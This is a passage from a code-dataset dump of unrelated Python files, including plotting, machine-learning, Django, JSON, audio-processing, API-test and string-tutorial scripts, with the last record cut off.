xmin_eigenvalues[i]\n + (fraction_finished + gap_correction_factor * fraction)\n * (xmax_eigenvalues[i] - xmin_eigenvalues[i]),\n eigenvalue_colors[component],\n linestyles=\"solid\",\n linewidth=eigenvalue_linewidth,\n )\n fraction_finished += gap_correction_factor * fraction + gap_fraction\n\n ax1.set_yscale(\"log\")\n ax1.set_xlim([base_xmin - 0.2, base_xmax + 0.2])\n y_max = max([max(ev) for ev in eigenvalues])\n ax1.set_ylim(0.0001 * y_max, 2.0 * y_max)\n\n ax1.set_xticks(xpos_ticks)\n ax1.set_xticklabels([\"\" for _ in labels], rotation=40, ha=\"right\")\n ax1.set_ylabel(r\"$I_{ij}$ eigenvalues\")\n\n # Lower plot\n ax3 = plt.subplot(212)\n\n bar_plot = ax3.bar(xpos_lower, determinants, width=width_lower, log=False)\n\n for i in range(n_entries):\n bar_plot[i].set_color(bar_colors_light[i])\n bar_plot[i].set_edgecolor(bar_colors[i])\n\n ax3.set_xlim([base_xmin - 0.2, base_xmax 
+ 0.2])\n ax3.set_ylim([0.0, max(determinants) * 1.05])\n\n ax3.set_xticks(xpos_ticks)\n ax3.set_xticklabels(labels, rotation=40, ha=\"right\")\n ax3.set_ylabel(r\"$(\\det \\ I_{ij})^{1/\" + str(size_lower) + r\"}$\")\n\n plt.tight_layout()\n return fig\n\n\ndef plot_distribution_of_information(\n xbins,\n xsecs,\n fisher_information_matrices,\n fisher_information_matrices_aux=None,\n xlabel=None,\n xmin=None,\n xmax=None,\n log_xsec=False,\n norm_xsec=True,\n epsilon=1.0e-9,\n figsize=(5.4, 4.5),\n fontsize=None,\n):\n \"\"\"\n Plots the distribution of the cross section together with the distribution of the Fisher information.\n\n Parameters\n ----------\n xbins : list of float\n Bin boundaries.\n\n xsecs : list of float\n Cross sections (in pb) per bin.\n\n fisher_information_matrices : list of ndarray\n Fisher information matrices for each bin.\n\n fisher_information_matrices_aux : list of ndarray or None, optional\n Additional Fisher information matrices for each bin (will be plotted with a dashed line).\n\n xlabel : str or None, optional\n Label for the x axis.\n\n xmin : float or None, optional\n Minimum value for the x axis.\n\n xmax : float or None, optional\n Maximum value for the x axis.\n\n log_xsec : bool, optional\n Whether to plot the cross section on a logarithmic y axis.\n\n norm_xsec : bool, optional\n Whether the cross sections are normalized to 1.\n\n epsilon : float, optional\n Numerical factor.\n\n figsize : tuple of float, optional\n Figure size, default: (5.4, 4.5)\n\n fontsize: float, optional\n Fontsize, default None\n\n Returns\n -------\n figure : Figure\n Plot as Matplotlib Figure instance.\n\n \"\"\"\n # prepare Plot\n if fontsize is not None:\n matplotlib.rcParams.update({\"font.size\": fontsize})\n\n # Prepare data\n n_entries = len(fisher_information_matrices)\n size = len(fisher_information_matrices[1])\n exponent = 1.0 / float(size)\n\n determinants = [np.nan_to_num(np.linalg.det(m) ** exponent) for m in fisher_information_matrices]\n\n if fisher_information_matrices_aux is not None:\n determinants_aux = [np.nan_to_num(np.linalg.det(m) ** exponent) for m in fisher_information_matrices_aux]\n\n if xlabel is None:\n xlabel = \"\"\n\n # Normalize xsecs\n if norm_xsec:\n norm = 1.0 / max(sum([xs for xs in xsecs]), epsilon)\n else:\n norm = 1.0\n xsec_norm = [norm * xs for xs in xsecs]\n\n # Get xvals from xbins\n xvals = [(xbins[i] + xbins[i + 1]) / 2 for i in range(0, len(xbins) - 1)]\n xvals = [xbins[0] - epsilon] + xvals + [xbins[len(xbins) - 1] + epsilon]\n assert len(xvals) == n_entries\n\n # Plotting options\n xs_color = \"black\"\n xs_linestyle = \"-\"\n xs_linewidth = 1.5\n\n det_color = \"red\"\n det_linestyle = \"-\"\n det_linewidth = 1.5\n det_fill_alpha = 0.1\n\n det_aux_color = \"red\"\n det_aux_linestyle = \"--\"\n det_aux_linewidth = 1.5\n\n # xsec plot\n fig = plt.figure(figsize=figsize)\n ax1 = plt.subplot(111)\n # fig.subplots_adjust(left=0.1667, right=0.8333, bottom=0.17, top=0.97)\n\n if log_xsec:\n ax1.set_yscale(\"log\")\n\n ax1.hist(\n xvals,\n weights=xsec_norm,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"step\",\n color=xs_color,\n linewidth=xs_linewidth,\n linestyle=xs_linestyle,\n )\n\n if norm_xsec:\n ax1.set_ylabel(r\"Normalized distribution\", color=xs_color)\n else:\n ax1.set_ylabel(r\"$\\sigma$ [pb/bin]\")\n ax1.set_xlim([xmin, xmax])\n ax1.set_ylim([0.0, max(xsec_norm) * 1.05])\n ax1.set_xlabel(xlabel)\n for tl in ax1.get_yticklabels():\n tl.set_color(xs_color)\n\n # det plot\n ax2 = ax1.twinx()\n\n if 
fisher_information_matrices_aux is not None:\n ax2.hist(\n xvals,\n weights=determinants_aux,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"step\",\n color=det_aux_color,\n linewidth=det_aux_linewidth,\n linestyle=det_aux_linestyle,\n )\n\n ax2.hist(\n xvals,\n weights=determinants,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"stepfilled\",\n alpha=det_fill_alpha,\n color=det_color,\n linewidth=0.0,\n )\n\n ax2.hist(\n xvals,\n weights=determinants,\n bins=xbins,\n range=(xmin, xmax),\n histtype=\"step\",\n color=det_color,\n linewidth=det_linewidth,\n linestyle=det_linestyle,\n )\n\n ax2.set_xlim([xmin, xmax])\n ax2.set_ylim([0.0, max(determinants) * 1.1])\n ax2.set_ylabel(r\"$(\\det \\; I_{ij})^{1/\" + str(size) + \"}$\", color=det_color)\n for tl in ax2.get_yticklabels():\n tl.set_color(det_color)\n\n return fig\n","repo_name":"madminer-tool/madminer","sub_path":"madminer/plotting/fisherinformation.py","file_name":"fisherinformation.py","file_ext":"py","file_size_in_byte":17483,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"99"} +{"seq_id":"17967984116","text":"import streamlit as slt\r\nslt.header(\"Application de prédiction de fev/fvc\")\r\nslt.subheader(\"Cette application permet de prédire le fev/fvc, dans un intervalle de confiance de 90% en fonction de l'age et de la taille\")\r\nslt.markdown(\"***Application developpée par Dr Fanny dans le cadre de sa formation en data science***\")\r\n\r\nimport pandas as pd\r\n\r\nimport numpy as np\r\n\r\ndf= pd.read_csv('https://raw.githubusercontent.com/pefura/IFPERA/main/Cameroon_lung_function.csv', sep= ';')\r\ndf = df.copy()\r\n\r\ndataset= df.loc[df['sex']== 2, ['age', 'height', 'fev', 'fvc']]\r\ndataset['fev/fvc']=dataset.fev/dataset.fvc\r\ndataset_c= dataset.drop([1127, 1561, 1628, 1741], axis=0)\r\ndata= dataset_c.drop(columns =['fev', 'fvc'])\r\n\r\n\r\ny = data['fev/fvc']\r\nX = data.drop(columns =['fev/fvc'])\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2,\r\n random_state=0 )\r\n\r\n#Gradient boosting model\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nGB_model_final= GradientBoostingRegressor(max_depth=2, n_estimators=225, random_state=0)\r\n\r\n## Fonction de calcul\r\nage = slt.number_input (label= 'Age en années')\r\nheight = slt.number_input (label= 'Taille en cm')\r\ndef prediction_fevfvc (age, height):\r\n fit_mean = GradientBoostingRegressor(loss=\"squared_error\", random_state=0, max_depth=2, n_estimators=225,)\r\n fit_mean.fit(X_train, y_train)\r\n fit_LLN= GradientBoostingRegressor(loss=\"quantile\", alpha=0.05, random_state=0, max_depth=2, n_estimators=225,)\r\n fit_LLN.fit(X_train, y_train)\r\n fit_ULN= GradientBoostingRegressor(loss=\"quantile\", alpha=0.95, random_state=0, max_depth=2, n_estimators=225,)\r\n fit_ULN.fit(X_train, y_train)\r\n var = {'age':[age],\r\n 'height':[height]}\r\n X1 = pd.DataFrame (var)\r\n pred_mean = fit_mean.predict(X1)\r\n LLN = fit_LLN.predict(X1)\r\n ULN = fit_ULN.predict(X1)\r\n table = pd.DataFrame([LLN [0],pred_mean[0], ULN[0]]).T\r\n table.columns = [\"LLN\", \"mean\", \"ULN\"]\r\n return table\r\n\r\nslt.markdown(\"Valeur moyenne prédite de fev/fvc\")\r\n\r\nfevfvc= slt.write(prediction_fevfvc (age, height))\r\n\r\nslt.text (\"LLN: limite inférieure de l'IC à 90%\")\r\n\r\nslt.text (\"ULN: limite supérieure de l'IC à 
90%\")\r\n\r\n\r\n\r\n\r\n","repo_name":"FannyMayoh/devoir_IFPERA","sub_path":"test_ap_ifpera.py","file_name":"test_ap_ifpera.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37640470571","text":"from multiprocessing import Queue\n\nfrom .common.blob import load_and_classify\nfrom .common.logging import log_debug as _log_debug\nfrom .common.logging import log_info as _log_info\nfrom .common.logging import log_warning as _log_warning\nfrom .common.logging import log_error as _log_error\nfrom .driver import do_generate\nfrom designformat import *\nimport designformat\n\ndef log_debug(message): _log_debug(f\"[WORKER] {message}\")\ndef log_info(message): _log_info(f\"[WORKER] {message}\")\ndef log_warning(message): _log_warning(f\"[WORKER] {message}\")\ndef log_error(message): _log_error(f\"[WORKER] {message}\")\n\ndef worker(\n path : str,\n tasks : list,\n tmpl_dirs : list,\n templates : dict,\n target : str,\n defines : dict,\n other_paths: list,\n return_q : Queue\n):\n \"\"\"\n Templating worker process that can be launched via multiprocessing.\n\n Args:\n path : Path to the DesignFormat blob to load.\n task : List of GenTasks for this worker to perform.\n tmpl_dirs : All of the directories to add to the template lookup\n templates : Map of all templates that are registered\n target : Path to the output directory\n defines : Extra values defined on the command line\n other_paths: Additional paths to files required by templates\n return_q : Cross-process queue for returning failures\n \"\"\"\n\n # Load the worker's copy of the blob file\n log_debug(\"Loading blob from: \" + path)\n df_root, classified = load_and_classify(path)\n\n # Work through the rendering tasks\n log_debug(f\"Starting to render {len(tasks)} tasks\")\n for task in tasks:\n # First find all of the referenced nodes\n log_debug(f\"Identifying {len(task.nodes)} nodes from the GenTask\")\n nodes = task.lookup_nodes(classified)\n # Kick off the generation task\n log_debug(f\"Kicking off the generation task\")\n do_generate(\n task, nodes, df_root, tmpl_dirs, templates, target, defines,\n other_paths\n )\n # Queue the task back to the master (returns errors etc)\n return_q.put(task)\n log_debug(f\"All tasks completed\")\n\n","repo_name":"bluwireless/blade-templating","sub_path":"blade_templating/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12764999565","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# 한글출력\r\nplt.rcParams['font.family'] = 'NanumBarunGothic'\r\nplt.rcParams['axes.unicode_minus'] = False\r\n\r\n# 51% 동전 확률 그래프 그리기\r\nheads_proba = 0.51\r\ncoin_tosses = (np.random.rand(10000, 10) < heads_proba).astype(np.int32)\r\ncumulative_heads_ratio = np.cumsum(coin_tosses, axis=0) / np.arange(1, 10001).reshape(-1, 1)\r\n\r\nplt.figure(figsize=(8,3.5))\r\nplt.plot(cumulative_heads_ratio)\r\nplt.plot([0, 10000], [0.51, 0.51], \"k--\", linewidth=2, label=\"51%\")\r\nplt.plot([0, 10000], [0.5, 0.5], \"k-\", label=\"50%\")\r\nplt.xlabel(\"동전을 던진 횟수\")\r\nplt.ylabel(\"앞면이 나온 비율\")\r\nplt.legend(loc=\"lower right\")\r\nplt.axis([0, 10000, 0.42, 0.58])\r\nplt.show()\r\n\r\n#moons 데이터셋 불러오기\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.datasets import make_moons\r\n\r\nX, y = make_moons(n_samples=500, noise=0.30, random_state=42)\r\nX_train, 
X_test, y_train, y_test = train_test_split(X, y, random_state=42)\r\n\r\ndef plot_dataset(X, y, axes):\r\n plt.plot(X[:, 0][y==0], X[:, 1][y==0], \"bs\")\r\n plt.plot(X[:, 0][y==1], X[:, 1][y==1], \"g^\")\r\n plt.axis(axes)\r\n plt.grid(True, which='both')\r\n plt.xlabel(r\"$x_1$\", fontsize=20)\r\n plt.ylabel(r\"$x_2$\", fontsize=20, rotation=0)\r\n\r\nplot_dataset(X, y, [-2, 3, -1.5, 2])\r\nplt.show()\r\n\r\n#투표기반 분류기\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import VotingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC\r\n\r\nlog_clf = LogisticRegression(solver='liblinear', random_state=42)\r\nrnd_clf = RandomForestClassifier(n_estimators=10, random_state=42)\r\nsvm_clf = SVC(gamma='auto', probability=True, random_state=42)\r\n\r\n# hard, soft 선택 필요\r\nvoting_clf = VotingClassifier(\r\n estimators=[('lr', log_clf), ('rf', rnd_clf), ('svc', svm_clf)],\r\n voting='hard')\r\nvoting_clf.fit(X_train, y_train)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfor clf in (log_clf, rnd_clf, svm_clf, voting_clf):\r\n clf.fit(X_train, y_train)\r\n y_pred = clf.predict(X_test)\r\n print(clf.__class__.__name__, accuracy_score(y_test, y_pred))\r\n\r\n# 배깅 실습\r\n\r\nfrom sklearn.ensemble import BaggingClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nbag_clf = BaggingClassifier(\r\n DecisionTreeClassifier(random_state=42), n_estimators=40,\r\n max_samples=100, bootstrap=True, n_jobs=-1, random_state=42)\r\nbag_clf.fit(X_train, y_train)\r\ny_pred = bag_clf.predict(X_test)\r\n\r\n# 배깅 정확도\r\nfrom sklearn.metrics import accuracy_score\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n# 단일 결정트리 정확도\r\ntree_clf = DecisionTreeClassifier(random_state=42)\r\ntree_clf.fit(X_train, y_train)\r\ny_pred_tree = tree_clf.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred_tree))\r\n\r\n\r\n\r\n#랜덤포레스트\r\n\r\nbag_clf = BaggingClassifier(\r\n DecisionTreeClassifier(splitter=\"random\", max_leaf_nodes=16, random_state=42),\r\n n_estimators=500, max_samples=1.0, bootstrap=True, n_jobs=-1, random_state=42)\r\nbag_clf.fit(X_train, y_train)\r\ny_pred = bag_clf.predict(X_test)\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrnd_clf = RandomForestClassifier(n_estimators=500, max_leaf_nodes=16, n_jobs=-1, random_state=42)\r\nrnd_clf.fit(X_train, y_train)\r\n\r\ny_pred_rf = rnd_clf.predict(X_test)\r\n\r\nprint(np.sum(y_pred == y_pred_rf) / len(y_pred)) # 거의 동일한 예측","repo_name":"bc8c/C211_ML","sub_path":"MLSample/SL_Ensemble.py","file_name":"SL_Ensemble.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74481670404","text":"from django.shortcuts import render\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.db.models import Count\nfrom .forms import ProfileForm, ContactForm\nfrom .models import Profile, MainAbilities, Education, Experience, Certificates, Skill, RecentWork\n\n\n\n#--------------------------------------MAIN CV PAGE -------------------------------------------------\ndef home(request):\n about = Profile.objects.filter(status='active')\n abilities = list(MainAbilities.objects.all())\n education = Education.objects.all()\n experience = Experience.objects.all()\n skills = Skill.objects.filter(active='True')\n # portfolio_count = RecentWork.objects.annotate(num_categories=Count('category'))\n if request.method == \"POST\":\n message_name = request.POST['name']\n 
message_email = request.POST['email']\n message = request.POST['message']\n\n send_mail(\n message_name, # name of sender\n message, # text\n message_email, # email\n ['contact@ninjaweb.tech'], # to email\n fail_silently=False,\n )\n\n context = {\n # 'form': form,\n # 'technical_skills': technical_skills,\n # 'professional_skills': professional_skills,\n # 'language_skills': language_skills,\n # 'hobby_skills': hobby_skills,\n 'skills': skills,\n 'experience': experience,\n 'education': education,\n 'abilities': abilities,\n 'about': about,\n 'message_name': message_name,\n 'message_email': message_email,\n 'message': message,\n }\n return render(request, 'resume1/index.html', context)\n\n\n else:\n # return the page\n context = {\n 'skills': skills,\n 'experience': experience,\n 'education': education,\n 'abilities': abilities,\n 'about': about,\n\n }\n return render(request, 'resume1/index.html', context)\n#======================== page not found page================================\ndef page_not_found(request, exception):\n template = 'services/404.html'\n return render(request, template, {})\n#======================== page not found page================================\ndef server_error(request):\n template = 'services/500.html'\n return render(request, template, {})\n","repo_name":"ungureanudaniel/resume1","sub_path":"resumeapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7823359206","text":"#CGPA Calculator\nCA_Total=100\nCA_Wtg=25\nMTE_Total=40\nMTE_Wtg=20\nETE_Total=70\nETE_Wtg=50\nC_code=input(\"Enter course code \")\nCA_obt=int(input(\"CA mark obtain \"))\nMTE_obt=int(input(\"MTE mark obtain \"))\nETE_obt=int(input(\"ETE mark obtain \"))\nAt=int(input(\"Enter Attendance mark \"))\nCA_mark=(CA_obt*CA_Wtg)/CA_Total\nMTE_mark=(MTE_obt*MTE_Wtg)/MTE_Total\nETE_mark=(ETE_obt*ETE_Wtg)/ETE_Total\ntotal=CA_mark+MTE_mark+ETE_mark+At\nprint(\"Mark Obtain for \",C_code,\" \",total, end=\" \")\nprint(\"Final CGPA =\",total/10)","repo_name":"mdsakilansari/PythonBasic","sub_path":"CGPA_Calculator.py","file_name":"CGPA_Calculator.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41460316302","text":"'''\r\nes un formato que nos permite hacer transferencia de datos/ intercambio de informacion entre distintas apps y esta inspirado en la manera que javascript se definen los objetos de manera literal\r\n'''\r\n\r\nimport json #para poder trabajaron con json\r\n'''json.dumps #convertir informacion en formato json\r\njson.loads #convertir de json a python\r\njson.dump #nos permite enviar info hacia un archivo\r\njson.load #nos permite recuperar info de un archivo\r\n\r\nentero = 33\r\njsonEntero = json.dumps(entero) #convierte a formato json\r\nprint(type(jsonEntero))\r\npythonEntero = json.loads(jsonEntero) #convierte a formato python\r\nprint(type(pythonEntero))\r\n\r\n\r\ncadena = 'Hola mundo'\r\njsonCadena= json.dumps(cadena)\r\nprint(type(jsonCadena))\r\npythonCadena = json.loads(jsonCadena)\r\nprint(type(jsonCadena))\r\n\r\n\r\nlista = [1,2,'tres']\r\njsonLista = json.dumps(lista) #representa en formato json la lista\r\npythonLista = json.loads(lista) #vuelve a la version de python\r\n\r\n\r\ndiccionario = {'entero':1, 'cadena':'hola', 'lista':[1,2,'tres', 4.4]}\r\njsonDiccionario = 
json.dumps(diccionario)\r\nprint(type(jsonDiccionario))\r\npythonDiccionario = json.loads(jsonDiccionario)\r\nprint(type(pythonDiccionario))\r\n'''\r\ndiccionario = {'entero':1, 'cadena':'hola', 'lista':[1,2,'tres', 4.4]}\r\n\r\n#vamos a escribir en un archivo el diccionario\r\nwith open('archivo_json.json', 'w') as archivo: #abrimos el archivo\r\n json.dump(diccionario, archivo) #envio la info con dump(que quiero enviar, donde lo quiero escribir)\r\n\r\n\r\n#vamos a recuperar esa info\r\nwith open('archivo_json.json', 'r') as archivo: #abrimos el archivo\r\n datos = json.load(archivo) #envio la info con dump(que quiero enviar, donde lo quiero escribir)\r\n\r\nprint(datos)","repo_name":"faculezcano2/learn-python","sub_path":"pythoncourse/formatoJSON.py","file_name":"formatoJSON.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"44058275287","text":"import torch\nimport librosa\nimport numpy as np\n\nSAMPLE_RATE = 16000\nFRAME_SHIFT = 0.0125\nFRAME_LENGTH = 0.05\nTOP_DB = 15\nPREEMHPASIS = 0.97\nN_FFT = 2048\nHOP_LENGTH = int(SAMPLE_RATE*FRAME_SHIFT)\nWIN_LENTGH = int(SAMPLE_RATE*FRAME_LENGTH)\nN_MELS = 512\nREF_DB = 20\nMAX_DB = 100\nN_GRIFFIN_LIM_ITER = 100\nFRAME_SIZE = 1\n\ndef get_spectrograms(fpath):\n \"\"\"\n Returns mel spect from wav file.\n \"\"\"\n y, sr = librosa.load(fpath, sr=SAMPLE_RATE)\n y, _ = librosa.effects.trim(y, top_db=TOP_DB)\n y = np.append(y[0], y[1:] - PREEMHPASIS * y[:-1])\n # stft\n linear = librosa.stft(y=y,\n n_fft=N_FFT,\n hop_length=HOP_LENGTH,\n win_length=WIN_LENTGH)\n\n mag = np.abs(linear)\n # mel spectrogram\n mel_basis = librosa.filters.mel(sr=SAMPLE_RATE, n_fft=N_FFT, n_mels=N_MELS)\n mel = np.dot(mel_basis, mag)\n # to decibel\n mel = 20 * np.log10(np.maximum(1e-5, mel))\n # normalize\n mel = np.clip((mel - REF_DB + MAX_DB) / MAX_DB, 1e-8, 1)\n # Transpose\n mel = mel.T.astype(np.float32)\n\n return mel\n\ndef infinite_iter(loader):\n it = iter(loader)\n while True:\n try:\n ret = next(it)\n yield ret\n except StopIteration:\n it = iter(loader)\n\ndef save_model(model, optimizer, iteration):\n torch.save(model.state_dict(), f'model_save_iter_{iteration}.ckpt')\n torch.save(optimizer.state_dict(), f'opt_save_iter_{iteration}.opt')\n print(\"Saving model ===>>>\")","repo_name":"mkalinowski11/Voice-Conversion-Tests","sub_path":"Variational-Autencoder-VC/auto_vc_utils.py","file_name":"auto_vc_utils.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4111083883","text":"import requests\nimport json\nimport pytest\n\njson_file = 'update_pet.json'\nwith open(json_file, 'r') as file:\n request_body = json.load(file)\n\n\n@pytest.mark.order(3)\nclass TestUpdatePet:\n\n def test_status_code_is_200(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n assert response.status_code == 200, 'The status code is not 200'\n\n def test_content_type_in_response_headers(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n assert response.headers['Content-Type'] == response.headers['Content-Type'], \\\n f\"The content-type in response headers is not {response.headers['Content-Type']}\"\n\n def test_id_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert 
response_body['id'] == request_body['id'], 'The response id is wrong'\n\n def test_name_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body['category']['name'] == request_body['category']['name'], \\\n \"The name in response body is wrong\"\n\n def test_photo_url_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body[\"photoUrls\"] == request_body[\"photoUrls\"], \\\n 'The photo url is wrong in response body'\n\n def test_status_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body['status'] == request_body['status'], \\\n 'The status in response body is wrong'\n","repo_name":"yerdos-s/API-testing-of-Petstore.swagger.io","sub_path":"test_update_pet.py","file_name":"test_update_pet.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7345284406","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# # author:靳文龙\n# # @time: 2020/4/1 23:17\n\"1:将两个字符串紧挨着写在一起\"\nstr1 = \"Python教程\" \"http://c.biancheng.net/python/\"\nprint(str1)\n\"2: str() 和 repr() 函数将数字转换为字符串\"\n\"\"\"\nstr() 用于将数据转换成适合人类阅读的字符串形式。\nrepr() 用于将数据转换成适合解释器阅读的字符串形式(Python 表达式的形式)\n\"\"\"\n\"\"\"s 本身就是一个字符串,但是我们依然使用 str() 和 repr() 对它进行了转换。\n从运行结果可以看出,str() 保留了字符串最原始的样子,而 repr() 使用引号将字符串包围起来\n这就是 Python 字符串的表达式形式\"\"\"\ns = \"http://c.biancheng.net/shell/\"\ns_str = str(s)\ns_repr = repr(s)\nprint( type(s_str) )\nprint (s_str)\nprint( type(s_repr) )\nprint (s_repr)\n\n\"3:使用[ ]除了可以获取单个字符外,还可以指定一个范围来获取多个字符,也就是一个子串或者片段\"\nurl = 'http://c.biancheng.net/java/'\n#获取索引从3处22(不包含22)的子串\nprint(url[7: 22]) # 输出 zy\n#获取索引从7处到-6的子串\nprint(url[7: -6]) # 输出 zyit.org is very\n#获取索引从-7到6的子串\nprint(url[-21: -6])\n#从索引3开始,每隔4个字符取出一个字符,直到索引22为止\nprint(url[3: 22: 4])\n\nurl = 'http://c.biancheng.net/java/'\n#获取从索引5开始,直到末尾的子串\nprint(url[7: ])\n#获取从索引-21开始,直到末尾的子串\nprint(url[-21: ])\n#从开头截取字符串,直到索引22为止\nprint(url[: 22])\n#每隔3个字符取出一个字符\nprint(url[:: 3])\n\n\"4:汉字在 GBK/GB2312 编码中占用 2 个字节,而在 UTF-8 编码中一般占用 3 个字节\"\nstr1 = \"人生苦短,我用Python\"\n# len(str1.encode('gbk'))\n# len(str1.encode())\n\n\"5:字符串常用函数\"\n\"\"\"\nstr.split(sep,maxsplit) 方法可以实现将一个字符串按照指定的分隔符切分成多个子串,这些子串会被保存到列表中(不包含分隔符),作为方法的返回值反馈回来\nsep:用于指定分隔符,可以包含多个字符。此参数默认为 None,表示所有空字符,包括空格、换行符“\\n”、制表符“\\t”等。\nmaxsplit:可选参数,用于指定分割的次数,最后列表中子串的个数最多为 maxsplit+1。如果不指定或者指定为 -1,则表示分割次数没有限制\n\"\"\"\n\n\"\"\"\n str.join(iterable)它是 split() 方法的逆方法,用来将列表(或元组)中包含的多个字符串连接成一个字符串\n>>> list = ['c','biancheng','net']\n>>> '.'.join(list)\n'c.biancheng.net'\n\"\"\"\n\n\"\"\"\nstr.count(sub[,start[,end]])\nstr:表示原字符串;\nsub:表示要检索的字符串;\nstart:指定检索的起始位置,也就是从什么位置开始检测。如果不指定,默认从头开始检索;\nend:指定检索的终止位置,如果不指定,则表示一直检索到结尾\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.count('.', 1)\nstr.count('.',2)\nstr.count('.',2,-3)\n\n\"\"\"\nstr.find(sub[,start[,end]])\nstr:表示原字符串;\nsub:表示要检索的目标字符串;\nstart:表示开始检索的起始位置。如果不指定,则默认从头开始检索;\nend:表示结束检索的结束位置。如果不指定,则默认一直检索到结尾\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.find('.',2)\n#位于索引(2,-4)之间的字符串为“biancheng”,由于其不包含“.”,因此 find() 方法的返回值为 -1\nstr.find('.',2,-4)\n#Python 还提供了 rfind() 方法,与 find() 方法最大的不同在于,rfind() 是从字符串右边开始检索\nstr.rfind('.') 
#11\n\n\"\"\"\nstr.index(sub[,start[,end]])\nstr:表示原字符串;\nsub:表示要检索的子字符串;\nstart:表示检索开始的起始位置,如果不指定,默认从头开始检索;\nend:表示检索的结束位置,如果不指定,默认一直检索到结尾\n\"\"\"\n#index() 方法也可以用于检索是否包含指定的字符串,不同之处在于,当指定的字符串不存在时,index() 方法会抛出异常\n# find() 和 rfind() 一样,字符串变量还具有 rindex() 方法,其作用和 index() 方法类似,不同之处在于它是从右边开始检索\nstr = \"c.biancheng.net\"\n# str.index('z')\nstr.rindex('.') #11\n\n\"\"\"\nstartswith() 方法用于检索字符串是否以指定字符串开头,如果是返回 True;反之返回 False\nendswith() 方法用于检索字符串是否以指定字符串结尾,如果是则返回 True;反之则返回 False\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.startswith(\"c\")\nstr.startswith(\"http\")\nstr.startswith(\"b\", 2)\nstr.endswith(\"net\")\n\n\"\"\"\ntitle() 方法用于将字符串中每个单词的首字母转为大写,其他字母全部转为小写,转换完成后,此方法会返回转换得到的字符串\nlower() 方法用于将字符串中的所有大写字母转换为小写字母,转换完成后,该方法会返回新得到的字符串\nupper() 的功能和 lower() 方法恰好相反,它用于将字符串中的所有小写字母转换为大写字母\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.title()#'C.Biancheng.Net'\nstr = \"I LIKE C\"\nstr.lower()#'i like c'\nstr = \"i like C\"\nstr.upper()#'I LIKE C'\n\n\"特殊字符,指的是制表符(\\t)、回车符(\\r)、换行符(\\n)\"\n\"\"\"\n字符串变量提供了 3 种方法来删除字符串中多余的空格和特殊字符,它们分别是:\nstrip():删除字符串前后(左右两侧)的空格或特殊字符。\nlstrip():删除字符串前面(左边)的空格或特殊字符。\nrstrip():删除字符串后面(右边)的空格或特殊字符。\n通过 strip() 确实能够删除字符串左右两侧的空格和特殊字符,但并没有真正改变字符串本身\n\"\"\"\nstr = \" c.biancheng.net \\t\\n\\r\"\nprint(str.strip())\nprint(\"-------------\")\nprint(str.strip(\" ,\\r\"))#'c.biancheng.net \\t\\n'\nprint(\"-------------\")\nprint(str)#' c.biancheng.net \\t\\n\\r'\nprint(\"-------------\")\nprint(str.lstrip())#'c.biancheng.net \\t\\n\\r'\nprint(\"-------------\")\nprint(str.rstrip())#' c.biancheng.net'\n\n\"\"\"\nstr.format(args)\nstr 用于指定字符串的显示样式;args 用于指定要进行格式转换的项,如果有多项,之间有逗号进行分割\n\"\"\"","repo_name":"Aigend/leetcode","sub_path":"md/net/test_string_0401.py","file_name":"test_string_0401.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"3750440962","text":"myDict={\r\n \"py\": \"python\",\r\n \"txt\":\"text\",\r\n \"java\": \"java\",\r\n \"cpp\":\"c++\",\r\n \"c\": 